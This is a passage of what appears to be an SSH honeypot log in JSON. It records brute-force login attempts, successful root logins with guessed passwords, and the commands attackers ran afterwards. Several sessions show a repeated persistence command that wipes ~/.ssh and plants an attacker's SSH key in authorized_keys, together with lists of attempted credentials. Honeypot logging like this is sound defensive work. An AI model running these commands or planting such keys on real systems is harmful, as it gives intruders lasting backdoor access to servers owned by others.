"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (5 distinct queries). Vector identities: admin
{
"id": "22dd537d64c2",
"src_ip": "2.57.121.112",
"start_time": "2026-05-17T22:17:22.412815Z",
"end_time": "2026-05-17T22:17:29.186290Z",
"duration": "6.8",
"version": "SSH-2.0-PuTTY_Release_0.83",
"hassh": "57446c12547a668110aa237e5965e374",
"attempts": [
{
"user": "admin",
"pass": "atkins"
},
{
"user": "admin",
"pass": "atilla"
},
{
"user": "admin",
"pass": "atheist"
},
{
"user": "admin",
"pass": "asterix1"
},
{
"user": "admin",
"pass": "aster"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (5 distinct queries). Vector identities: user
{
"id": "e58ff46c999f",
"src_ip": "2.57.121.25",
"start_time": "2026-05-17T22:16:59.190148Z",
"end_time": "2026-05-17T22:17:05.950517Z",
"duration": "6.8",
"version": "SSH-2.0-PuTTY_Release_0.83",
"hassh": "57446c12547a668110aa237e5965e374",
"attempts": [
{
"user": "user",
"pass": "251289"
},
{
"user": "user",
"pass": "25121977"
},
{
"user": "user",
"pass": "251080"
},
{
"user": "user",
"pass": "25101993"
},
{
"user": "user",
"pass": "25101981"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "534104931869",
"src_ip": "124.156.198.218",
"start_time": "2026-05-17T22:12:16.833722Z",
"end_time": "2026-05-17T22:12:17.962995Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "c331039be2b6",
"src_ip": "124.156.198.218",
"start_time": "2026-05-17T22:12:14.533220Z",
"end_time": "2026-05-17T22:12:16.655780Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / knight25
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "d2754422407f",
"src_ip": "124.156.198.218",
"start_time": "2026-05-17T22:12:12.184156Z",
"end_time": "2026-05-17T22:12:17.959258Z",
"duration": "5.8",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "knight25"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "740565012068",
"src_ip": "213.135.168.228",
"start_time": "2026-05-17T22:07:09.208414Z",
"end_time": "2026-05-17T22:07:10.345077Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "b13126c6d09a",
"src_ip": "213.135.168.228",
"start_time": "2026-05-17T22:07:06.868248Z",
"end_time": "2026-05-17T22:07:09.028972Z",
"duration": "2.2",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / p0o9i8u7
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "876751b92e5a",
"src_ip": "213.135.168.228",
"start_time": "2026-05-17T22:07:04.252307Z",
"end_time": "2026-05-17T22:07:10.342082Z",
"duration": "6.1",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "p0o9i8u7"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "84184b13b7a0",
"src_ip": "152.32.175.179",
"start_time": "2026-05-17T22:05:10.359548Z",
"end_time": "2026-05-17T22:05:11.690200Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "98efcf0ed9b6",
"src_ip": "152.32.175.179",
"start_time": "2026-05-17T22:05:07.816577Z",
"end_time": "2026-05-17T22:05:10.153087Z",
"duration": "2.3",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / nq123
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "3681b13df4e0",
"src_ip": "152.32.175.179",
"start_time": "2026-05-17T22:05:05.276958Z",
"end_time": "2026-05-17T22:05:11.693582Z",
"duration": "6.4",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "nq123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}